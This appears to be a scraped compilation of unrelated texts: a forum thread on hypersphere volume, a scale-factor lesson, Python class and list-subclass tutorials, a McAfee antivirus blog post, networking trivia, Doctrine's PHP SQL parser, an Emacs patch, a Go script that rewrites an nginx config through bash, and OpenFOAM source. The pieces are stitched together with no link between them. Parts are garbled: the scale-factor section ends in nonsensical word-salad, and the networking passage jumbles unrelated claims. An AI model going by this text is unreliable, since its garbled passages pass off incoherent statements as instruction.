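Note that offsets has one more entry than there are processors, exactly as `offsets_.resize(Pstream::nProcs(comm)+1)` does.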
Sunshine Custom Object App Requirements
Sunshine Custom Objects let you define new object types in Zendesk, then create and persist objects based on those types. Relationships can be defined and managed between these and other custom objects, or with native Zendesk objects like tickets and users.
To create a Sunshine custom object app requirement, define a custom object type in your requirements.json file. This has the same structure and options as a Sunshine API object type, but omits the data key. You can define up to 50 custom objects per app.
Example
"custom_objects": { "custom_object_types": [ { "key": "product", "schema": { "properties": { "id": { "type": "string", "description": "The unique identifier for a product" }, "name": { "type": "string", "description": "The name of the product" } }, "required": ["id", "name"] } } ]}
Relationships
A relationship between custom objects can be specified with a custom object relationship type. This has the same structure and options as a Sunshine API relationship type, but omits the data key.
Example
"custom_objects": { "custom_object_relationship_types": [ { "key": "manufacturer", "source": "product", "target": "manufacturer" } ], "custom_object_types": [ { "key": "product", "schema": { "properties": { "id": { "type": "string", "description": "The unique identifier for a product" }, "name": { "type": "string", "description": "The name of the product" }, }, "required": ["id", "name"] } }, { "key": "manufacturer", "schema": { "properties": { "id": { "type": "string", "description": "The unique identifier for a manufacturer" }, "name": { "type": "string", "description": "The name of the manufacturer" }, }, "required": ["id", "name"] } } ]}
Relationship types can also be specified with native Zendesk object types including tickets and users. See Relationship Types in the Sunshine API documentation for more information.
171S5.1_p - Cape Fear Community College
MAT 171 Precalculus Algebra
Trigsted - Pilot Test
Dr. Claude Moore - Cape Fear Community College
CHAPTER 5:
Exponential and Logarithmic
Functions and Equations
5.1 Exponential Functions
5.2 The Natural Exponential Function
5.3 Logarithmic Functions
5.4 Properties of Logarithms
5.5 Exponential and Logarithmic Equations
5.6 Applications of Exponential and Logarithmic Functions
5.1 Exponential Functions
·Understand characteristics of exponential functions.
·Sketch graphs of exponential functions using transformations.
·Solve exponential equations by relating bases.
·Solve applications of exponential functions.
Omit Present Value on pages 5.1-21-23;
Example 7.
Exponential Function
The function f(x) = b^x, where x is a real number, b > 0 and b ≠ 1, is
called the exponential function, base b.
The base needs to be positive in order to avoid the complex numbers that
would occur by taking even roots of negative numbers.
The following are examples of exponential functions:
Graphing Exponential Functions
To graph an exponential function, follow the steps listed:
1. Compute some function values and list the results in a table.
2. Plot the points and connect them with a smooth curve. Be sure to plot enough points to determine how steeply the curve rises.
Example
Graph the exponential function y = f(x) = 2^x.
Example (continued)
As x increases, y increases without bound; as x → ∞, y → ∞.
As x decreases, y decreases, getting close to 0; as x → −∞, y → 0.
The x-axis, or the line y = 0, is a
horizontal asymptote. As the x-inputs decrease, the curve gets
closer and closer to this line, but
does not cross it.
Example
Graph the exponential function
This tells us the graph is the reflection of the graph of y = 2^x across the y-axis. Selected points are listed in the table.
Example (continued)
As x increases, the function values decrease, getting closer and closer to 0. The x-axis, y = 0, is the horizontal asymptote. As x decreases, the function values increase without bound.
Graphs of Exponential Functions
Observe the following graphs of exponential functions and look for
patterns in them.
For a base between 0 and 1, the graph goes DOWN toward the x-axis to the right.
For a base greater than 1, the graph goes UP to the right.
Example
Graph y = 2^(x – 2).
The graph is the graph of y = 2^x shifted right 2 units.
Example
Graph y = 5 – 0.5^x.
The graph of y = 2^(−x) is a reflection of the graph of y = 2^x across the y-axis;
y = −2^(−x) is a reflection across the x-axis;
y = −2^(−x) + 5, or y = 5 − 2^(−x), is a shift up 5 units.
[Figure: four graphs showing the sequence of transformations; the line y = 5 is the horizontal asymptote.]
Find the exponential function f(x) = b^x whose graph is given as follows.
See the animation for the solutions.
http://media.pearsoncmg.com/ph/esm/esm_trigsted_colalg_1/anim/tca01_anim_0501ex04.html
The amount of money A that a principal P will grow to after t years at interest rate r (in decimal form), compounded n times per year, is given by the formula A = P(1 + r/n)^(nt).
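As a quick numerical illustration of the compound-interest formula (the input values here are my own, not from the worksheet):

```python
def compound_balance(P, r, n, t):
    """Account balance after t years: principal P, annual rate r (decimal),
    compounded n times per year: A = P * (1 + r/n)**(n*t)."""
    return P * (1 + r / n) ** (n * t)

# $1000 at 6% compounded monthly for 10 years:
print(round(compound_balance(1000, 0.06, 12, 10), 2))  # → 1819.4
```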
403/10. Match the function with one of the graphs: f(x) = 1 − e^x
403/14. Graph the function by substituting and plotting points. Then check your work using a graphing calculator: f(x) = 3^(−x)
403/20. Graph the function by substituting and plotting points. Then check your work
using a graphing calculator: f(x) = 0.6 x - 3
403/4. Find each of the following, to four decimal places, using a calculator.
403/34. Sketch the graph of the function and check the graph with a graphing calculator. Describe how the graph can be obtained from the graph of a basic exponential function: f(x) = 3^(4 − x)
404/50. Use the compound-interest formula to find the account balance A with the
given conditions:
A = account balance; t = time, in years; n = number of compounding periods per
year; r = interest rate; P = principal
405/58. Growth of Bacteria Escherichia coli. The bacteria Escherichia coli are commonly found in the
human intestines. Suppose that 3000 of the bacteria are present at time t = 0. Then under certain conditions, t
minutes later, the number of bacteria present is N(t) = 3000(2)^(t/20).
a) How many bacteria will be present after 10 min? 20 min? 30 min? 40 min? 60 min?
b) Graph the function.
c) These bacteria can cause intestinal infections in humans when the number of bacteria reaches 100,000,000.
Find the length of time it takes for an intestinal infection to be possible.
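The model above can be checked numerically. A short sketch (my own computation, not part of the original slides):

```python
import math

def bacteria(t, n0=3000, doubling_time=20):
    """Population t minutes after the start, doubling every 20 minutes."""
    return n0 * 2 ** (t / doubling_time)

# (a) counts at selected times
for t in (10, 20, 30, 40, 60):
    print(t, round(bacteria(t)))

# (c) time until the population reaches 100,000,000:
# solve 3000 * 2^(t/20) = 1e8  =>  t = 20 * log2(1e8 / 3000)
t_infection = 20 * math.log2(1e8 / 3000)
print(round(t_infection, 1))  # ≈ 300.5 minutes, about 5 hours
```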
407/76. Use a graphing calculator to match the equation with one of the figures (a) - (n): y = 2^x + 2^(−x)
407/82. Use a graphing calculator to match the equation with one of the figures (a) - (n): f(x) = (e^x + e^(−x)) / 2
407/84. Use a graphing calculator to find the point(s) of intersection of the graphs of each of the following pairs of equations: y = 4^x + 4^(−x) and y = 8 − 2x − x^2
407/88. Solve graphically: e^x = x^3
Embed an Authenticated Chart using a Custom JWT Provider
On this page
• Prerequisites
• Procedures
• Enable Authenticated Embedding for a Chart
• Configure Charts to use your Custom JWT Provider
• Create a Web App to Display your Chart
• Customize the Node.js App
Many websites use authentication systems that generate JWTs to represent a signed-in user. If your website produces JWTs, you can configure Charts to validate the existing tokens to authorize the rendering of embedded charts. Alternatively, if your site does not already use JWTs as a part of the authentication process, you can write code to generate JWTs explicitly for the purpose of authorizing chart renders.
This tutorial shows the latter approach. The example shows you how to generate a simple JWT for a logged in user and send it to Charts.
Charts uses the details you provided when you configure a provider to validate JWTs it receives with requests to render embedded charts. If the token is invalid or does not conform to the details you provided, Charts doesn't render the authenticated chart view.
Enable authenticated embedding to generate a Charts Base URL and a chart ID. You will need your Charts Base URL and chart ID to display your chart on a web page.
1
From your dashboard page, select the dashboard containing the chart you wish to embed.
2
From the dashboard, click at the top-right of the chart to access its embedding information. Select Embed Chart from the dropdown menu.
3
If you have already enabled external sharing on the data source this chart uses, skip this step. If you haven't yet enabled embedding on the data source, you can do so now. Click the Configure external sharing link.
4
Embed authenticated chart
5
6
You can specify a function to inject a MongoDB filter document for each user who views the chart. This is useful for rendering user-specific charts.
Example
The following filter function only renders data where the ownerId field of a document matches the value of the Embedding Authentication Provider's token's sub field:
function getFilter(context) {
return { ownerId: context.token.sub };
}
Tip
See also:
To learn more about injecting filters per user, see Inject User-Specific Filters.
7
Specify the fields on which chart viewers can filter data. By default, no fields are specified, meaning the chart cannot be filtered until you explicitly allow at least one field.
Tip
See also:
To learn more about filterable fields, see Specify Filterable Fields.
8
Use these values in your application code together with your Embedded Authentication Provider attributes to embed your chart.
Note
When you configure authentication using a custom JWT provider, you can choose the signing algorithm. This tutorial uses the HS256 signing algorithm. If you select the RS256 signing algorithm, you can also choose one of the following signing keys:
• JSON web key (JWK) or JSON web key set (JWKS) URL: Charts retrieves the key from the JWK or JWKS file at the specified URL. Charts then uses the key to validate the JSON web token. If there are multiple keys in the file, Charts tries each key until it finds a match.
• PEM public key: Charts uses the specified public key to verify the JSON web token.
1
1. If Charts is not already displayed, click Charts in the navigation bar.
2. Click Charts Settings in the sidebar.
2
3
Field
Value
Name
Enter charts-jwt-tutorial.
Provider
Select Custom JSON Web Token.
Signing Algorithm
Select HS256.
Signing Key
Enter topsecret.
4
If you already have an app in which to display your chart, you’re all set. If not, proceed with the remaining steps.
MongoDB offers a pre-built sample that shows you how to use the Embedding SDK to authenticate an embedded chart using a JWT.
Clone the GitHub repository and follow the instructions in the Readme file to begin using the app. You can customize it to use the chart you created earlier.
1
Warning
Generate JWTs server-side to protect your signing keys from exposure.
The app.js file in the sample application uses a simple web service and the jsonwebtoken package to generate and return a JWT signed using the HS256 algorithm when a user logs in to the application with these credentials:
• User name: admin
• Password: password
const express = require("express");
const bodyParser = require("body-parser");
const cors = require("cors");
const jwt = require("jsonwebtoken");
const config = require("./config.js");

const app = express();
const port = 8000;

// Configuring body parser middleware
app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());
app.use(cors());

app.post("/login", (req, res) => {
  const loginDetails = req.body;
  // mock a check against the database
  let mockedUsername = "admin";
  let mockedPassword = "password";

  if (
    loginDetails &&
    loginDetails.username === mockedUsername &&
    loginDetails.password === mockedPassword
  ) {
    let token = jwt.sign({ username: loginDetails.username }, config.secret, {
      expiresIn: "24h" // expires in 24 hours
    });
    res.json({ bearerToken: token });
  } else {
    res.status(401).send(false);
  }
});

app.listen(port, () => console.log(`Example app listening on port ${port}!`));
Note
Your application must handle refreshing or issuing new tokens before they expire.
In the sample application, the signing key topsecret is defined in a file in your application named config.js:
module.exports = {
secret: "topsecret"
};
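For illustration only, an HS256 token of the shape this service issues can be built from scratch with standard-library primitives. This is a sketch of the JWS compact serialization (header.payload.signature), not the jsonwebtoken package itself, and it omits registered claims such as exp:

```python
import base64, hashlib, hmac, json

def b64url(data: bytes) -> str:
    # base64url without padding, as JWS requires
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(payload: dict, secret: str) -> str:
    """Build a compact JWS: header.payload.signature, signed with HMAC-SHA256."""
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    signing_input = f"{header}.{body}".encode()
    sig = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

token = sign_hs256({"username": "admin"}, "topsecret")
print(token.count("."))  # → 2 (three dot-separated segments)
```

Charts validates exactly this structure against the signing key you configured (topsecret in this tutorial).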
2
1. Create a new object from the ChartsEmbedSDK class. Provide:
• The value of the baseUrl property with the URL that points to your Charts instance. To embed one of your charts in the sample application, replace this value with the Base URL from your Embed Chart dialog.
• The chartId property to specify the unique identifier of the chart you want to embed. To embed one of your charts in the sample application, replace this value with the Chart ID from your Embed Chart dialog.
• The getUserToken property to specify the function that generates and returns a JWT from your authentication provider.
• Any optional properties you want to provide. For a list of all properties you can use when you embed charts using the SDK, see SDK option reference.
In the src/index.js file in the sample application, the login function in the getUserToken property calls the web service you created to generate a JWT. If login is successful, that function returns a valid JWT to the getUserToken property.
import ChartsEmbedSDK from "@mongodb-js/charts-embed-dom";
import "regenerator-runtime/runtime";

document
  .getElementById("loginButton")
  .addEventListener("click", async () => await tryLogin());

function getUser() {
  return document.getElementById("username").value;
}

function getPass() {
  return document.getElementById("password").value;
}

async function tryLogin() {
  if (await login(getUser(), getPass())) {
    document.body.classList.toggle("logged-in", true);
    await renderChart();
  }
}

async function login(username, password) {
  const rawResponse = await fetch("http://localhost:8000/login", {
    method: "POST",
    headers: {
      Accept: "application/json",
      "Content-Type": "application/json"
    },
    body: JSON.stringify({ username: username, password: password })
  });
  const content = await rawResponse.json();

  return content.bearerToken;
}

async function renderChart() {
  const sdk = new ChartsEmbedSDK({
    baseUrl: "https://localhost/mongodb-charts-iwfxn", // ~REPLACE~ with the Base URL from your Embed Chart dialog
    chartId: "d98f67cf-374b-4823-a2a8-f86e9d480065", // ~REPLACE~ with the Chart ID from your Embed Chart dialog
    getUserToken: async function() {
      return await login(getUser(), getPass());
    }
  });
2. For each chart that you want to embed, invoke the createChart method of the object you just created. To embed one of your charts in the sample application, replace the value of the chartId property with the Chart ID from your Embed Chart dialog.
The following example shows an invocation of the createChart method in the src/index.js file in the sample application.
const chart = sdk.createChart({ chartId: "d98f67cf-374b-4823-a2a8-f86e9d480065" }); // ~REPLACE~ with the Chart ID from your Embed Chart dialog
3
Use the render method of your chart object to render it in your application.
The following example shows an invocation of the render method in the src/index.js file in the sample application.
chart.render(document.getElementById("chart"));
4
Charts renders the chart if it can validate the token it received with the request to render the chart. If the token isn't valid, Charts doesn't render the chart and displays an error code.
For more information on the Charts embedding error codes, see Embedded Chart Error Codes.
© 2021 MongoDB, Inc.
coefficient of kurtosis formula
Sometimes an estimate of kurtosis is used in a goodness-of-fit test for normality (D'Agostino and Stephens, 1986). Kurtosis is the degree of peakedness or flatness of a curve, denoted by Ku; it tells us the degree to which data values cluster in the tails or the peak of a distribution. The moment coefficient of kurtosis of a data set is computed almost the same way as the moment coefficient of skewness, changing the exponent 3 to 4 in the formulas: kurtosis a4 = m4 / m2^2, where m4 = Σ(xi − x̄)^4 / n is the fourth central moment and m2 is the second central moment (the variance); the excess kurtosis is g2 = a4 − 3. The distribution is called normal if the coefficient equals 3, so once we can calculate kurtosis we can compare the values obtained rather than shapes. An alternative is the percentile coefficient of kurtosis, KU = QD / PR, where QD is the quartile deviation and PR is the percentile range. With Excel it is straightforward to calculate kurtosis, but note that Excel's kurtosis function reports excess kurtosis. If the coefficient of kurtosis of a return distribution is larger than 3, the distribution is inconsistent with the assumption of normality: large-magnitude returns occur more frequently than under a normal distribution.

A related measure of asymmetry is the coefficient of skewness, which lies within the limits ±1 and equals zero for a symmetrical distribution; if the mean is greater than the mode, the coefficient of skewness is positive. Bowley's quartile version is Skewness = (Q1 + Q3 − 2Q2) / (Q3 − Q1).
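A small numerical illustration of the moment coefficient (the dataset is my own, chosen for easy hand-checking):

```python
def moment_kurtosis(xs):
    """b2 = m4 / m2^2, the moment coefficient of kurtosis."""
    n = len(xs)
    mean = sum(xs) / n
    m2 = sum((x - mean) ** 2 for x in xs) / n  # variance (second central moment)
    m4 = sum((x - mean) ** 4 for x in xs) / n  # fourth central moment
    return m4 / m2 ** 2

b2 = moment_kurtosis([1, 2, 3, 4, 5])
print(b2)                 # → 1.7  (m4 = 6.8, m2 = 2)
print(round(b2 - 3, 1))   # → -1.3 excess kurtosis: flatter-tailed than normal
```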
The skewness and kurtosis parameters are both measures of the shape of a distribution. Skewness (the coefficient of asymmetry) describes the tendency of deviations from the mean to be larger in one direction than the other; in probability theory and statistics it measures the asymmetry of the probability distribution of a real-valued random variable about its mean, and its value can be positive, zero, negative, or undefined. Kurtosis is measured by Pearson's coefficient b2 (read 'beta two'), computed as μ4 / σ^4, where μ4 is the fourth moment about the mean and σ is the standard deviation. The kurtosis of the standard normal distribution is 3, so the excess kurtosis is found as Excess Kurtosis = Kurtosis − 3, and the types of kurtosis (leptokurtic, mesokurtic, platykurtic) are determined by the sign of the excess kurtosis. When analyzing historical returns, a leptokurtic distribution means that small changes are less frequent, since historical values are clustered around the mean while large-magnitude moves occur more often than under normality.
OrryG posted a question
3.) The time spent (in days) waiting for a heart transplant in two states for patients with type A+ blood can be approximated by a normal distribution, as shown in the graph to the right. Complete parts (a) and (b) below.
μ= 126
σ= 20.4
Graph line is 55 left tail and 200 right tail
(round to two decimal points please)
(a) What is the shortest time spent waiting for a heart that would still place a patient in the top 10% of waiting times?
In days?
Tutor answered the question
Dear Student,
By default, we can hit Answer Button only once after we accept an...
|
__label__pos
| 0.997611 |
There are some inheritance relationships in the Java collection interfaces. For example, the Collection<T> interface extends Iterable<T>. I checked the source code in the JDK, and some methods defined in a base interface are repeated in sub-interfaces several times. For example, the Iterable<T> interface defines a method Iterator<E> iterator(); but the interfaces Collection<E> and List<T> also contain the same method. In my understanding, since inheritance is used to reduce duplication, why should we define the same method in subclasses?
4 Answers
See in java.util.List
"The List interface places additional stipulations, beyond those specified in the Collection interface, on the contracts of the iterator, add, remove, equals, and hashCode methods. Declarations for other inherited methods are also included here for convenience."
+1 In fact I'd guess the reasons for redeclaring those methods are (as the citation you posted states): 1. being able to add different JavaDoc comments (i.e. the contracts that are mentioned) and 2. as a convenience to provide a quick overview of the available methods. – Thomas Jul 16 '12 at 13:52
Collection came out in release 1.2, but Iterable came out afterwards in release 1.5 to allow for concise for-loops, so I think it was a case of keeping the Collection interface and the Javadocs the same between releases. But you are correct, there is no reason you couldn't remove the iterator() method from Collection, everything would still compile.
The Collection interface extends Iterable. An abstract superclass implements the methods common to several classes, in the case of lists, it's AbstractList, with each concrete class (say, ArrayList or LinkedList) providing the specific implementation details.
In fact, as you've guessed, inheritance is used for reducing code duplication. But precisely because of that, all the subclasses will contain the same operations defined in the superclasses, the implementation details common to several classes will appear only once in the class hierarchy at the abstract class level, and they are not "defined" again in the subclasses - only the parts that change are redefined in concrete subclasses.
The Iterable interface was introduced later, in 1.5. So prior to that version, only java.util.Collection subclasses implemented iterator().
Later, iterator() was standardized by introducing the Iterable interface, so that any class that can be iterated over can implement it.
After Iterable was introduced, the Collection interface was also made to extend it, so that Collection implements the standard interface too.
For Ex,
• java.sql.SQLException also implements Iterable
Since he's refering to interfaces there's no overriding involved. – Thomas Jul 16 '12 at 13:45
⑨BIE — https://9bie.org/ — 伪技术宅的迷之地 ~~ Strange Place Of The Pseudo Geeks

PAM_EXEC 不用第三方应用和重启抓取ssh密码 (Capturing SSH Passwords Without Third-Party Apps or a Reboot) — Wed, 10 Jul 2024, https://9bie.org/index.php/archives/1022/

Preface
A new trick learned from a foreigner: https://www.youtube.com/watch?v=FQGu9jarCWY
Getting started
Upsides first: it uses only what ships with the system (no third-party software), needs no reboot, doesn't generate huge files like the strace approach, can clean up after itself without a trace, and can exfiltrate remotely.
Downside: SELinux has to be turned off temporarily.
pam_exec.so ships with the system — see its man page for details. To log passwords, just add this as the first line of /etc/pam.d/sshd:
auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh
[image: 1.png]
The path of the script at the end can be changed, but the line must come first — PAM processes modules in priority order.
Then put this in /tmp/sshd.sh:
#!/bin/sh
echo "$(date) $PAM_USER $(cat -) $PAM_RHOST $PAM_RUSER" >> /tmp/123.log
And remember to make it executable for all users!!! chmod 777 /tmp/sshd.sh or chmod u+x /tmp/sshd.sh — otherwise execution fails too.
Then SSH to ourselves, and we can grab the password:
[image: 2.png]
Being able to run a shell script opens up many options — exfiltrate the password via curl/DNS, auto-delete after a successful capture, and so on.
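For reference, the same logging helper could be written in Python — a hedged sketch only: pam_exec passes the typed password on stdin when expose_authtok is set, and the PAM context arrives in PAM_* environment variables. The field layout mirrors the shell one-liner above; the function name is mine.

```python
import datetime
import io
import os
import sys


def format_pam_record(stream=None, env=None):
    """Build one log line from a pam_exec invocation.

    With expose_authtok, pam_exec writes the authentication token
    (the typed password) to the script's stdin; PAM_USER / PAM_RHOST
    arrive as environment variables.
    """
    stream = sys.stdin if stream is None else stream
    env = os.environ if env is None else env
    password = stream.read().rstrip("\x00\n")
    return "%s %s %s %s" % (
        datetime.datetime.now().isoformat(),
        env.get("PAM_USER", "?"),
        password,
        env.get("PAM_RHOST", "?"),
    )

# Intended hookup (hypothetical): point the pam_exec line at a wrapper that
# appends format_pam_record() + "\n" to /tmp/123.log.
```

The injectable stream/env parameters are just there so the formatting can be exercised without a live PAM session.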
Of course there are two problems. One is that by default SELinux must be off, or nothing is captured.
Problem 1: SELinux
If the change above doesn't take effect, check /var/log/secure —
you'll find something like this:
[image: 3.png]
At that point you need setenforce 0 to disable SELinux temporarily before the script can capture passwords.
If you're worried about being noticed, append setenforce 1 to the end of the script above to restore SELinux after the capture.
That's not very robust though — an EDR may monitor SELinux being disabled and alert the moment we do it.
Another option is to modify the SELinux policy. After making the change, run:
audit2allow -a
audit2allow -a -M local
semodule -i local.pp
to adjust the rules — but some distributions don't ship audit2allow by default, so weigh it yourself.
Problem 2: telling correct passwords apart
By default this scheme captures and stores every password attempt and cannot tell which ones were correct.
Ippsec's approach is to drop the expose_authtok constraint from auth optional pam_exec.so quiet expose_authtok /tmp/sshd.sh and place the line after successful authentication.
That way, when the script receives an empty-input signal, PAM has already reached the step where the password passed verification — meaning the previously captured password was correct. Could this be a race condition? I don't know, but it works; in the video Ippsec implements the flow in Go.
If it were me, I might use another brute-force method: read /etc/shadow directly and have our script verify the hash ourselves. That probably adds latency but perhaps avoids the race. Too lazy to write it now — some other time.
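The /etc/shadow idea from the last paragraph might look like the sketch below. It is hypothetical — the post never implemented it — and the crypt_fn parameter is injected so the caller can pass crypt.crypt (available in CPython up to 3.12) or any other crypt(3)-compatible function.

```python
import hmac


def password_matches(candidate, shadow_line, crypt_fn):
    """Check a captured password against one line of /etc/shadow.

    shadow_line looks like 'user:$6$salt$hash:...'; crypt(3)-style
    functions return the full '$6$salt$hash' string when handed the
    stored value as the salt, so equality means the password is right.
    """
    fields = shadow_line.split(":")
    if len(fields) < 2:
        return False
    stored = fields[1]
    if stored in ("", "*") or stored.startswith("!"):
        return False  # locked account or no password set
    # compare in constant time rather than with ==
    return hmac.compare_digest(crypt_fn(candidate, stored), stored)
```

The test below injects a fake crypt_fn so the sketch can be exercised without the platform crypt module.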
That's all.
记一次肾透 (A Pentest Write-up) — Mon, 11 Mar 2024, https://9bie.org/index.php/archives/982/

Nothing left to post with, and this one didn't even succeed, so I might as well put it out there.
This is an old case. It was embarrassing enough that I never dared mention it, and some resources weren't fully screenshotted at the time — just skim along. Bored one day: let's hack something!
Who should the target be? Let's just pick one.
*电? Pretty hardcore — them it is!
An external sweep turned up a pile of assets: either in-house software or simple Node.js front ends with few features. Very few assets looked attackable at a glance.
[image: index-1_1.png]
What to do? Then we spotted a very nice target:
[image: 2.jpg]
A system named eipplus — clearly something OA-like, so it must have plenty of features. A quick search for public assets:
[image: index-1_3.png]
Excellent, very promising! There are many, many sites running the same codebase — that's our breakthrough point!
In short, first get a copy of the source. Then the familiar supply-chain routine: with that many sites, surely at least one falls.
[image: index-2_1.png]
An unremarkable SQL injection at a supplier.
An unremarkable getshell.
[image: index-2_2.png]
[image: index-2_3.png]
An unremarkable target discovered.
[image: index-2_4.png]
Unremarkably owned.
How? Intranet data happened to match sysadmin's password; after logging into the backend, the logo-image upload let us drop a webshell directly.
Download the source! One look:
[image: index-3_1.png]
I cracked on the spot — it's SourceGuardian-encrypted. I wanted to cry. Still, at least we can now see what the system looks like inside and how the code is structured.
Spinning up a local environment, it looks roughly like this:
[image: index-3_4.png]
[image: index-4_1.png]
[image: index-4_2.png]
[image: index-4_3.png]
Some casual screenshots, just for fun.
And the rough directory structure:
[image: index-5_1.png]
At this point we have the target's code — albeit encrypted — plus a high-privilege backend on a sibling site. But we certainly don't have sysadmin on the actual target.
Now we have a few options:
• Black-box: combine the directory layout with the backend, find an unauthenticated endpoint, and kill it
• Find a backdoor/developer tool, figure out how to decrypt, then kill it
• Find a privilege escalation from a low-privilege account to admin, then reuse our logo-upload shell trick on the target
Looking at the likely vulnerability spots — for this kind of system they boil down to a few places:
• Photo albums
• Attachments
• Uploads
• System environment management
• System updates
After testing them all, the security was passable: ordinary users cannot reach the system-update or environment-management backends at all, and the albums/attachments have no obviously unauthenticated getshell.
Only the second route remains. Let's look at the directory structure.
For black-box review of a directory tree, we focus on a few things:
• File managers (filemanager) — any unauthenticated access?
• Developer tools (tools/develops) — any leftover dev backdoors?
• Utilities (utils) — mainly unauthenticated access
• Logs (log) — mainly information leaks
• Config files (config) — usually reveal nothing, but I list them because when something does show up it's great
• Admin backends (admin) — again, unauthenticated access
Note this is under black-box conditions: without full source we can't audit the business logic in depth — in a real white-box review plenty of bugs live in the business code.
Anything matching these keywords is basically interesting and worth poking at — try opening it and look for unauthenticated interfaces or dev leftovers.
A few of these are quite interesting. One:
[image: index-6_1.png]
This folder likely contains the developers' debugging tools — SQL query tools, file managers, and the like. And:
[image: index-6_2.png]
It says iso, but it's essentially a zip-related tool, so it may have a malformed-path zip bug — escaping with ../../ for an arbitrary file write.
I also glanced through the admin directory — all interesting stuff:
[image: index-7_1.png]
And one particularly fun file:
[image: index-8_1.png]
Presumably the license certificate — except that <?php is very interesting.
A quick round of black-box testing found zero unauthenticated interfaces. I was dumbfounded. Now what? Time to reverse.
SourceGuardian 12 encryption. Taobao quotes 5 RMB per file to decrypt — with these thousands of files, that would take until the year of the monkey, and the output is barely readable anyway. No choice: install tooling and reverse the bytecode by hand.
[image: index-9_1.png]
I installed vld and stared at opcodes byte by byte, working through developtools and admin for half a day. Learned absolutely nothing.
My brain nearly hemorrhaged. The angrier I got, the bolder: fine — let's just hack the vendor instead.
The vendor is easy to identify straight from the code:
本系统由百*资通维护 ("This system is maintained by 百*资通")
A round of recon:
[image: index-9_2.png]
They even have a Git server:
[image: index-9_3.png]
[image: index-10_1.png]
Great, full of spirit — let's hit it! Except the damn Git isn't reachable. Now what?
There were some git leaks too, but nothing useful.
Their other sites are either eipplus test instances or bare front ends with nothing on them. What now?
Then we noticed something:
[image: index-10_2.png]
A 30-day free trial?
Figuring it couldn't hurt, I registered and applied.
[image: index-11_1.png]
And they actually sent it — lol, that confident in their own system.
[image: index-11_2.png]
Of course we hit it. Same old trick: backend → system management → upload LOGO image — and... patched. Upload failed.
Back to the other items. Environment management done; on to system updates.
[image: index-11_3.png]
Update the SaaS service? And remember that saas.txt in the admin directory, the one starting with <?:
[image: index-12_1.png]
Well hello, what a coincidence. So: add a one-liner webshell,
[image: index-12_2.png]
upload — dead! Sure enough, the license is loaded straight with include. lol
[image: index-12_3.png]
Incidentally, their whole stack is deployed as root — very impressive. The web directory is entirely unwritable; only this saas.txt is writable by us.
One more look: no need to hit Git after all — their deployed site ships unencrypted source. Happily downloaded it.
The site got incident-responded the very next day (does Amazon have some agent-based detection? no idea how that happened), but no matter.
Happy auditing time!
Taking stock of current assets:
• What we have: the complete white-box source
• A low-privilege account on the target — well, not in hand yet, but assume we will get one; with that many employees, if we can't land a single account we shouldn't be doing pentests at all. Have some confidence.
So the need is simple: what was semi-black-box is now fully white-box, which opens many more doors — the business code and the framework are all auditable now.
Following the Java playbook — look for Fastjso... oh wait, this is PHP. Same idea though: first check autoloaders and the like.
[image: index-14_1.png]
GuzzleHttp at a glance.
Then grep for unserialize — and there really is one!!
[image: index-15_1.png]
In calendar/csv_import.php — and ordinary users can reach it!
Build the request straight with PHPGGC (the real payload needs some extra encoding; it's shown like this just for readability):
POST /eipplus/calendar/csv_import.php
action=next
next=1
trans=111
fieldsep=1
cal_fields=O:24:"GuzzleHttp\Psr7\FnStream":2:{s:33:" GuzzleHttp\Psr7\FnStream methods";a:1:{s:5:"close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:" GuzzleHttp\HandlerStack handler";s:9:"phpinfo()";s:30:" GuzzleHttp\HandlerStack stack";a:1:{i:0;a:1:{i:0;s:6:"assert";}}s:31:" GuzzleHttp\HandlerStack cached";b:0;}i:1;s:7:"resolve";}}s:9:"_fn_close";a:2:{i:0;O:23:"GuzzleHttp\HandlerStack":3:{s:32:" GuzzleHttp\HandlerStack handler";s:9:"phpinfo()";s:30:" GuzzleHttp\HandlerStack stack";a:1:{i:0;a:1:{i:0;s:6:"assert";}}s:31:" GuzzleHttp\HandlerStack cached";b:0;}i:1;s:7:"resolve";}}
[image: index-15_2.png]
Local test: works with ease.
I figured: just write a webshell on the damn target and be done — then remembered their whole stack is deployed under root.
Whatever, try it anyway! Go!
https://osheip.**.com.tw/eipplus/home/index.php 121public/121public
An account obtained with zero effort first.
[image: index-16_1.png]
[image: index-16_2.png]
The vulnerable endpoint exists too.
Write! ...Dead. The write failed. Not a disaster though — we're 98% there, one step short of perfect.
Regroup. We now have a getshell path: the web directory is unwritable, but saas.txt is. Guzzle's file-write gadget uses file_put_contents with a relative path by default, so we don't even need the webroot's absolute path to hit saas.txt. If we only wanted a shell and didn't care what happens after, we could simply overwrite saas.txt with our own via the deserialization. But that has a problem:
a direct write destroys the original SaaS config, the site blows up immediately, and even after getting a shell we couldn't restore it — we have no idea what the original config was — so we'd be spotted at light speed. Which leaves one final goal: find a bug to download saas.txt first!, then in the dead of night quickly write the backdoored saas.txt, connect the shell, and put saas.txt back.
Then came the nightmare: auditing the business code. This damned codebase totals 500 MB — the most terrifying episode had arrived!!
No choice but to push through: file_get_contents, fopen, the whole pile — everything was either patched or written very safely. Painful. Sad.
After two-plus hours, finally, finally, finally, finally, finally — genius, genius, genius that I am — a successful read.
Back to the focus list above:
• Albums (lost)
• Attachments
• Uploads (lost)
• System environment management (lost)
• System updates (lost)
The concrete flow:
Publish a post.
[image: index-17_1.png]
Add any attachment.
[image: index-17_2.png]
Intercept the request and modify tmp_name to traverse directories.
[image: index-17_3.png]
Looking at the source, in common_functions.inc.php the tmp_name is concatenated directly into the path — no filtering at all!!!
So after publishing, the downloadable attachment becomes whatever file tmp_name points at. Point tmp_name at saas.txt, publish, then download our own attachment — and saas.txt comes back to us! Sweet!
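The root cause — concatenating a client-controlled tmp_name into a path — can be reproduced in a few lines. A hedged sketch (the function names and paths are mine, not eipplus code) showing the unsafe join next to the containment check that would have blocked it:

```python
import os

UPLOAD_DIR = "/var/www/eipplus/data/attach"  # hypothetical attachment root


def unsafe_resolve(tmp_name):
    # What the vulnerable code effectively does: blind concatenation,
    # so "../" sequences walk out of the upload root.
    return os.path.normpath(os.path.join(UPLOAD_DIR, tmp_name))


def safe_resolve(tmp_name):
    # Resolve, then verify the result is still inside the upload root.
    full = os.path.normpath(os.path.join(UPLOAD_DIR, tmp_name))
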